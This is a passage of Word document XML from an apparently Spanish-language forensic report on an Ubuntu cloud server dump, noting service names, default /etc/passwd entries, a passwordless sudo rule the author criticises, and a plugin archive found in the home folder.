        <w:t xml:space="preserve"> keyboard-setup.sh</w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> kmod</w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> lvm2</w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> lvm2-lvmetad</w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> lvm2-lvmpolld</w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> lxcfs</w:t>
      </w:r>
      <w:r w:rsidR="00E15DB8" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lxd</w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> mdadm</w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> mdadm-waitidle</w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> mysql</w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> open-iscsi</w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> open-vm-tools</w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> plymouth</w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> plymouth-log</w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> postfix</w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> procps</w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> rsync</w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> rsyslog</w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> screen-cleanup</w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ssh</w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> udev</w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ufw</w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> unattended-upgrades</w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> uuidd</w:t>
      </w:r>
      <w:r w:rsidR="00DA1FF3" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738E6260" w14:textId="13A11478" w:rsidR="000C4414" w:rsidRPr="00E15DB8" w:rsidRDefault="000C4414">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Se confirma en </w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> que:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3860FD3A" w14:textId="457AE559" w:rsidR="000C4414" w:rsidRPr="00E15DB8" w:rsidRDefault="000C4414">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>El usuario UserID</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>UserID: Identificador único asignado a un usuario de un sistema o red.</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E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 33 es www-data </w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDF79C0" w14:textId="08EB3621" w:rsidR="000C4414" w:rsidRPr="00E15DB8" w:rsidRDefault="000C4414">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">No hay </w:t>
      </w:r>
      <w:r w:rsidR="00E15DB8" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>más</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> usuarios después de creados en el servidor que aparte de Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Ubuntu: Una distribución de Linux basada en Debian, popular por su facilidad de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E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3224D74A" w14:textId="6CCADE98" w:rsidR="000C4414" w:rsidRPr="00E15DB8" w:rsidRDefault="000C4414">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">En </w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/home/jrodg85/volcado-datos/etc/sudoers.d/</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> encontramos el archivo </w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>90-cloud-init-users</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> el cual indica </w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ubuntu ALL=(ALL) NOPASSWD:ALL</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A63F6F7" w14:textId="2692FDFE" w:rsidR="000C4414" w:rsidRPr="00E15DB8" w:rsidRDefault="000C4414">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Esta </w:t>
      </w:r>
      <w:r w:rsidR="001C6280" w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>acción</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> viene por defecto en las instancias EC2, pero no viene normalmente dentro de los servidores independientes de Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Ubuntu: Una distribución de Linux basada en Debian, popular por su facilidad de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E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Esto lo que hace es no requerir contraseña cuando usas sudo con ese usuario, personalmente, no permitiría un NOPASSWD en un cloud server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DFC26B" w14:textId="0C8E4BC9" w:rsidR="000C4414" w:rsidRPr="00E15DB8" w:rsidRDefault="000C4414">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">En </w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/home/</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> solo encontramos una carpeta llamada Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Ubuntu: Una distribución de Linux basada en Debian, popular por su facilidad de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E15DB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, la cual solo tiene 2 archivos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3732360C" w14:textId="4B76FE5B" w:rsidR="000C4414" w:rsidRPr="001C6280" w:rsidRDefault="000C4414">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C6280">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>accelerated-mobile-pages.0.9.97.19.zip</w:t>
      </w:r>
      <w:r w:rsidR="001C6280" w:rsidRPr="001C6280">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C504686" w14:textId="49FE1C96" w:rsidR="000C4414" w:rsidRPr="001C6280" w:rsidRDefault="00FF4835">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251771904" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0FD4E073" wp14:editId="7759D4AE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>right</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>217805</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5392227" cy="1483995"/>
                <wp:effectExtent l="0" t="0" r="0" b="1905"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="1221419748" name="Grupo 58"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5392227" cy="1483995"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5392227" cy="1483995"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wpg:grpSp>
                        <wpg:cNvPr id="693630350" name="Grupo 17"/>
                        <wpg:cNvGrpSpPr/>
                        <wpg:grpSpPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3180080" cy="1483995"/>
                            <a:chOff x="0" y="0"/>
                            <a:chExt cx="3316412" cy="1571653"/>
                          </a:xfrm>
                        </wpg:grpSpPr>
                        <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                          <pic:nvPicPr>
                            <pic:cNvPr id="1127541983" name="Imagen 84" descr="Imagen de la pantalla de un celular con la imagen de un video juego&#10;&#10;Descripción generada automáticamente con confianza baja"/>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2083242" y="15903"/>
                              <a:ext cx="1233170" cy="1555750"/>
                            </a:xfrm>
                            <a:prstGeom prst="rect">
                              <a:avLst/>
                            </a:prstGeom>
                          </pic:spPr>
                        </pic:pic>
                        <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                          <pic:nvPicPr>
                            <pic:cNvPr id="673094205" name="Imagen 83" descr="Texto&#10;&#10;Descripción generada automáticamente"/>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1948180" cy="1563370"/>
                            </a:xfrm>
                            <a:prstGeom prst="rect">
                              <a:avLst/>
                            </a:prstGeom>
                          </pic:spPr>
                        </pic:pic>
                      </wpg:grpSp>
                      <wps:wsp>
                        <wps:cNvPr id="169216195" name="Cuadro de texto 1"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3363402" y="500932"/>
                            <a:ext cx="2028825" cy="654050"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:prstClr val="white"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4F0BFD12" w14:textId="2F1699E5" w:rsidR="00CF2570" w:rsidRPr="00A6304B" w:rsidRDefault="00CF2570" w:rsidP="00CF2570">
                              <w:pPr>
                                <w:pStyle w:val="Descripcin"/>
                                <w:rPr>
                                  <w:rFonts w:cs="Arial"/>
                                  <w:noProof/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">Ilustración </w:t>
                              </w:r>
                              <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                                <w:r w:rsidR="00117A4E">
                                  <w:rPr>
                                    <w:noProof/>
                                  </w:rPr>
                                  <w:t>35</w:t>
                                </w:r>
                              </w:fldSimple>
                              <w:r>
                                <w:t xml:space="preserve">: </w:t>
                              </w:r>
                              <w:bookmarkStart w:id="90" w:name="_Toc155782602"/>
                              <w:r w:rsidRPr="001F64A9">
                                <w:t xml:space="preserve">Archivo </w:t>
                              </w:r>
                              <w:r w:rsidR="00501A15">
                                <w:t>/etc/</w:t>
                              </w:r>
                              <w:r w:rsidRPr="001F64A9">
                                <w:t>passwd y comprimiendo volcado.</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FD4E073" id="Grupo 58" o:spid="_x0000_s1131" style="position:absolute;left:0;text-align:left;margin-left:373.4pt;margin-top:17.15pt;width:424.6pt;height:116.85pt;z-index:251771904;mso-position-horizontal:right;mso-position-horizontal-relative:margin" 